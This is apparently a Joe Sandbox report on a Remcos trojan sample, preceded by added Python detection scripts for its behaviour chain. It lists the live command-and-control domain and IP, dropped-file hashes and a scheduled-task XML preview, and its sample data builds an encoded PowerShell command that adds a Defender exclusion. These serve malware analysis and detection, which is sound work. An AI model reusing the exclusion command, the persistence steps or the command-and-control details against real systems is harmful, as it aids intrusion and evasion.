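The chain the graph above shows (a payload dropped to %APPDATA%, a scheduled task created from a temp XML, a Defender exclusion added through PowerShell) together with the browser credential-store paths in the Stealing of Sensitive Information section are the behaviours a detection engineer would want to catch on the endpoint. The Python below is an added example, not code from the Joe Sandbox report or from Remcos: it runs those checks over a constructed stream of endpoint events. The event field names, the command lines, the exclusion path and the list of legitimate browser images are assumptions; the report names the behaviours and paths, not the exact strings. The encoded-command decode step is what makes the Defender check work at all, since a plain string match for Add-MpPreference never sees the cmdlet inside an -EncodedCommand argument.

```python
"""Host-side triage for the behaviour chain in this report.

Added example: not part of the Joe Sandbox report and not Remcos code.
The events are CONSTRUCTED to mirror the report (payload dropped to
%APPDATA%, schtasks /Create from a temp XML, base64-encoded PowerShell
Add-MpPreference exclusion, browser credential store read by a non-browser).
Command lines, the exclusion path and the event field names are assumptions;
the report names the behaviours, not the strings.
"""
import base64
import re
from typing import Callable, Dict, List

Event = Dict[str, object]

# Indicators copied from the report (lower-cased for matching).
DROPPED_EXE = r"c:\users\user\appdata\roaming\rtdozxra.exe"
TEMP_DIR = "\\appdata\\local\\temp\\"
CRED_STORES = ("\\login data", "\\key3.db")             # Chrome / Firefox paths from the report
BROWSERS = ("chrome.exe", "firefox.exe", "msedge.exe")  # assumed legitimate readers


def decode_encoded_command(cmdline: str) -> str:
    """Decode PowerShell's -EncodedCommand payload (base64 over UTF-16LE).
    Returns '' when there is no payload or it does not decode."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def check_process(ev: Event) -> List[str]:
    image = str(ev.get("image", "")).lower()
    cmd = str(ev.get("cmdline", ""))
    out: List[str] = []
    # Sigma "Scheduled temp file as task from temp location": schtasks /Create /XML <temp path>
    if image.endswith("\\schtasks.exe") and "/create" in cmd.lower():
        m = re.search(r'/xml\s+"?([^"\s]+)', cmd, re.I)
        if m and TEMP_DIR in m.group(1).lower():
            out.append(f"schtasks: task registered from temp XML {m.group(1)}")
    # Sigma "Powershell Base64 Encoded MpPreference Cmdlet": decode first, then match
    if image.endswith("\\powershell.exe"):
        decoded = decode_encoded_command(cmd)
        if re.search(r"add-mppreference.*-exclusion", decoded, re.I):
            out.append(f"powershell: encoded Defender exclusion -> {decoded}")
    return out


def check_file_write(ev: Event) -> List[str]:
    if str(ev.get("target", "")).lower() == DROPPED_EXE:
        return [f"file: known dropped payload written by {ev.get('image')}"]
    return []


def check_file_read(ev: Event) -> List[str]:
    target = str(ev.get("target", "")).lower()
    image = str(ev.get("image", "")).lower()
    if target.endswith(CRED_STORES) and not image.endswith(BROWSERS):
        return [f"credential access: {ev.get('image')} read {ev.get('target')}"]
    return []


CHECKS: Dict[str, Callable[[Event], List[str]]] = {
    "process": check_process,
    "file_write": check_file_write,
    "file_read": check_file_read,
}


def analyze(events: List[Event]) -> List[str]:
    """Run every check over the event list and return the findings in order."""
    findings: List[str] = []
    for ev in events:
        findings.extend(CHECKS.get(str(ev.get("type", "")), lambda _: [])(ev))
    return findings


# Constructed sample; the encoded command is built here so it decodes cleanly.
ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode()
SAMPLE_EVENTS: List[Event] = [
    {"type": "file_write", "image": r"C:\Users\user\Desktop\vQyKfYxzXB.exe",
     "target": r"C:\Users\user\AppData\Roaming\RTdozXra.exe"},
    {"type": "process", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {ENCODED}"},
    {"type": "process", "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"'},
    {"type": "file_read", "image": r"C:\Users\user\AppData\Roaming\RTdozXra.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_read", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS):
        print(line)
```

Mapping real telemetry onto the three event shapes is left to the reader; Sysmon process-creation and file-creation events cover the first two, but file reads of the credential stores are not something Sysmon logs by itself, so that check needs an EDR or ETW file-access source.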

Antivirus detection, initial sample:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| vQyKfYxzXB.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
| vQyKfYxzXB.exe | 100% | Avira | HEUR/AGEN.1306877 |
| vQyKfYxzXB.exe | 100% | Joe Sandbox ML | |

Antivirus detection, dropped file:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Roaming\RTdozXra.exe | 100% | Avira | HEUR/AGEN.1306877 |
| C:\Users\user\AppData\Roaming\RTdozXra.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Roaming\RTdozXra.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |

No Antivirus matches (next detection table)
No Antivirus matches (next detection table)
URL reputation:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| decmainserver.webredirect.org | 0% | Avira URL Cloud | safe |

Contacted domains and IPs:

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| decmainserver.webredirect.org | 69.174.98.48 | true | true | | unknown |

Contacted domains:

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| decmainserver.webredirect.org | true | Avira URL Cloud: safe | unknown |

The "safe" URL-cloud verdict for decmainserver.webredirect.org conflicts with the sandbox's own evidence: the domain resolves to the IP the sample contacted on three ports, and the context tables further down show the same IP and domain already associated with a Remcos sample. A clean reputation lookup for a dynamic-DNS name is uninformative here, not exculpatory.

URLs from memory and binaries:

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://geoplugin.net/json.gp | RTdozXra.exe | false | | high |
| http://geoplugin.net/json.gp/C | vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, vQyKfYxzXB.exe, 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vQyKfYxzXB.exe, 00000000.00000002.1314848353.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000B.00000002.1379421623.0000000003101000.00000004.00000800.00020000.00000000.sdmp | false | | high |

Contacted IPs:

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 69.174.98.48 | decmainserver.webredirect.org | United States | 8100 | ASN-QUADRANET-GLOBALUS | true |
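The tables above give one domain, one IP and, in the behavior graph, three destination ports on that IP. As an added example (not from the report and not Remcos code), the Python below applies those indicators plus the "many ports on one IP" heuristic to constructed Zeek-style conn.log and dns.log text. The client address 10.0.0.5, the timestamps, the uids and the 203.0.113.10 placeholder answer for geoplugin.net are assumptions; 13.107.246.45 is one of the Microsoft addresses the report whitelists and stands in for benign traffic. geoplugin.net sits in the report's URL list with a high reputation and "false" for malicious, so it is reported separately as a weak check-in indicator rather than as C2.

```python
"""Network-side triage for the domain, IP and port indicators in this report.

Added example: not from the Joe Sandbox report and not Remcos code. The log
text is CONSTRUCTED in Zeek conn.log / dns.log column order; the client
address, timestamps, uids and the 203.0.113.10 placeholder for geoplugin.net
are assumptions.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

C2_IPS = {"69.174.98.48"}                        # report: contacted IP, malicious
C2_DOMAINS = {"decmainserver.webredirect.org"}   # report: contacted domain, malicious
CHECKIN_DOMAINS = {"geoplugin.net"}              # report: URL in binary, reputation high; weak alone
MANY_PORTS = 3                                   # graph: three ports on one IP

Conn = Tuple[str, int, str, int]                 # orig_h, orig_p, resp_h, resp_p


def parse_conn(text: str) -> List[Conn]:
    """Columns: ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto (tab-separated)."""
    conns: List[Conn] = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split("\t")
        conns.append((f[2], int(f[3]), f[4], int(f[5])))
    return conns


def parse_dns(text: str) -> Dict[str, str]:
    """Columns: ts query answer. Returns answer IP -> queried name."""
    names: Dict[str, str] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        _, query, answer = line.split("\t")
        names[answer] = query.lower()
    return names


def triage(conn_text: str, dns_text: str) -> Dict[str, List[str]]:
    """Return C2 hits, check-in hits and hosts contacted on MANY_PORTS or more ports."""
    names = parse_dns(dns_text)
    report: Dict[str, List[str]] = {"c2": [], "checkin": [], "many_ports": []}
    ports: Dict[Tuple[str, str], Set[int]] = defaultdict(set)
    for orig_h, _orig_p, resp_h, resp_p in parse_conn(conn_text):
        name = names.get(resp_h, "")
        ports[(orig_h, resp_h)].add(resp_p)
        if resp_h in C2_IPS or name in C2_DOMAINS:
            report["c2"].append(f"{orig_h} -> {resp_h}:{resp_p} ({name or 'no DNS name seen'})")
        elif name in CHECKIN_DOMAINS:
            report["checkin"].append(f"{orig_h} -> {name}:{resp_p}")
    for (orig_h, resp_h), seen in ports.items():
        if len(seen) >= MANY_PORTS:
            plist = ", ".join(str(p) for p in sorted(seen))
            report["many_ports"].append(f"{orig_h} -> {resp_h} on ports {plist}")
    return report


# Constructed logs (not captured from the sandbox run).
CONN_LOG = "\n".join([
    "1736526610.1\tCa1\t10.0.0.5\t50001\t69.174.98.48\t45682\ttcp",
    "1736526612.4\tCa2\t10.0.0.5\t50002\t69.174.98.48\t49702\ttcp",
    "1736526615.9\tCa3\t10.0.0.5\t50003\t69.174.98.48\t49820\ttcp",
    "1736526620.0\tCa4\t10.0.0.5\t50004\t203.0.113.10\t80\ttcp",
    "1736526630.0\tCa5\t10.0.0.5\t50005\t13.107.246.45\t443\ttcp",
])
DNS_LOG = "\n".join([
    "1736526609.0\tdecmainserver.webredirect.org\t69.174.98.48",
    "1736526619.0\tgeoplugin.net\t203.0.113.10",
])

if __name__ == "__main__":
    for kind, hits in triage(CONN_LOG, DNS_LOG).items():
        for h in hits:
            print(f"[{kind}] {h}")
```

The DNS join matters because the C2 name is dynamic DNS: if the operator re-points decmainserver.webredirect.org, the IP indicator goes stale while the name match keeps working, and the many-ports heuristic flags the new host even before either indicator is updated.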
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587729
Start date and time: 2025-01-10 17:29:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: vQyKfYxzXB.exe (renamed because the original name is a hash value)
Original Sample Name: 0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@20/11@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 291
• Number of non-executed functions: 146
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 172.202.163.200, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: vQyKfYxzXB.exe
| Time | Type | Description |
|---|---|---|
| 11:30:07 | API Interceptor | 4286471x Sleep call for process: vQyKfYxzXB.exe modified |
| 11:30:08 | API Interceptor | 17x Sleep call for process: powershell.exe modified |
| 11:30:12 | API Interceptor | 1x Sleep call for process: RTdozXra.exe modified |
| 17:30:09 | Task Scheduler | Run new task: RTdozXra, path: C:\Users\user\AppData\Roaming\RTdozXra.exe |
IP context:

| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| 69.174.98.48 | Ref#60031796.exe | malicious | Remcos |

Domain context:

| Match | Associated Sample Name / URL | Detection | Threat Name | Resolved IP |
|---|---|---|---|---|
| decmainserver.webredirect.org | Ref#60031796.exe | malicious | Remcos | 69.174.98.48 |

ASN context (ASN-QUADRANET-GLOBALUS):

| Associated Sample Name / URL | Detection | Threat Name | IP |
|---|---|---|---|
| https://zfrmz.com/3GiGYUP4BArW2NBgkPU3 | malicious | Unknown | 45.61.152.125 |
| gem1.exe | malicious | CredGrabber, Meduza Stealer | 66.63.187.173 |
| armv5l.elf | malicious | Unknown | 104.237.80.14 |
| 30% Order payment-BLQuote_'PO#385995790.exe | malicious | AsyncRAT | 69.174.100.131 |
| drop1.exe | malicious | CredGrabber, Meduza Stealer | 66.63.187.173 |
| file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | 66.63.187.122 |
| drop1.exe | malicious | CredGrabber, Meduza Stealer | 66.63.187.173 |
| drop1.exe | malicious | CredGrabber, Meduza Stealer | 66.63.187.173 |
| file.exe | malicious | CredGrabber, Meduza Stealer | 66.63.187.173 |
| Fantazy.spc.elf | malicious | Unknown | 104.223.10.34 |
                        No context
                        No context
                        Process:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1396
                        Entropy (8bit):5.337066511654157
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
                        MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
                        SHA1:32F34219599006657BFF0B868257916A0C393AAA
                        SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
                        SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1396
                        Entropy (8bit):5.337066511654157
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
                        MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
                        SHA1:32F34219599006657BFF0B868257916A0C393AAA
                        SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
                        SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
                        Malicious:true
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.380747059108785
                        Encrypted:false
                        SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                        MD5:4D3B8C97355CF67072ABECB12613F72B
                        SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                        SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                        SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                        Malicious:false
                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1602
                        Entropy (8bit):5.119762820069892
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/v
                        MD5:9E20CB83F90F09C6AF491FC728E4B0A8
                        SHA1:F93A20F9EDEDD4D78A01A7BCB244E42BED7A4A00
                        SHA-256:C4053065421461B1D007028768F722BDFD4E7D2908AEAAC2AAB3D597EBD8431D
                        SHA-512:42E85EFD975E1C5DD489A5E41A94D76DBDD42AF4C2849171434290309D26DF48A33C03C7258DE30780E87718B7859AD733C62D1261F26D434A8C4CF03FD71031
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                        Process:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1602
                        Entropy (8bit):5.119762820069892
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/v
                        MD5:9E20CB83F90F09C6AF491FC728E4B0A8
                        SHA1:F93A20F9EDEDD4D78A01A7BCB244E42BED7A4A00
                        SHA-256:C4053065421461B1D007028768F722BDFD4E7D2908AEAAC2AAB3D597EBD8431D
                        SHA-512:42E85EFD975E1C5DD489A5E41A94D76DBDD42AF4C2849171434290309D26DF48A33C03C7258DE30780E87718B7859AD733C62D1261F26D434A8C4CF03FD71031
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1010176
                        Entropy (8bit):7.795583452160133
                        Encrypted:false
                        SSDEEP:24576:lG5oJaVtxpPhSo88M8taYVTwLknbBdrvmyzdKl83AXax:SvMAaYVTbnbfrv1z8lR
                        MD5:A5E057F72B814DDCC71246B8DD092E2A
                        SHA1:155810FADDF2F068FE49735BBD6A3A13A60C75C3
                        SHA-256:0D0CC505A458E4983DA79246C321DFDA6EDC4D9B1F14E902AC13788A27C53AFA
                        SHA-512:3CB1FCDAB4B1D13FFDDE1CF5439FC69830DB3FCB9F444CBEA4A7167F88414CA630D09BA00742EE5D5A4B2F1C9F33EF13351781E447D34D5DB0AAD2F132D68CA9
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 71%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8...............0..`...........}... ........@.. ....................................@.................................z}..O....................................K..p............................................ ............... ..H............text...T^... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B.................}......H.......d...`.......(....X...............................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|....
                        Process:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.795583452160133
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        • Win32 Executable (generic) a (10002005/4) 49.75%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Windows Screen Saver (13104/52) 0.07%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        File name:vQyKfYxzXB.exe
                        File size:1'010'176 bytes
                        MD5:a5e057f72b814ddcc71246b8dd092e2a
                        SHA1:155810faddf2f068fe49735bbd6a3a13a60c75c3
                        SHA256:0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa
                        SHA512:3cb1fcdab4b1d13ffdde1cf5439fc69830db3fcb9f444cbea4a7167f88414ca630d09ba00742ee5d5a4b2f1c9f33ef13351781e447d34d5db0aad2f132d68ca9
                        SSDEEP:24576:lG5oJaVtxpPhSo88M8taYVTwLknbBdrvmyzdKl83AXax:SvMAaYVTbnbfrv1z8lR
                        TLSH:58250160264DE603D97A4BF90471F278177AAECA7C01D2068FD97CEB7936F950D086A3
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8...............0..`...........}... ........@.. ....................................@................................
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x4f7dce
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0xAF38D2CF [Mon Feb 26 17:33:03 2063 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        and byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], al
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        and byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax+00530000h], al
                        jns 00007F69C8FA68E2h
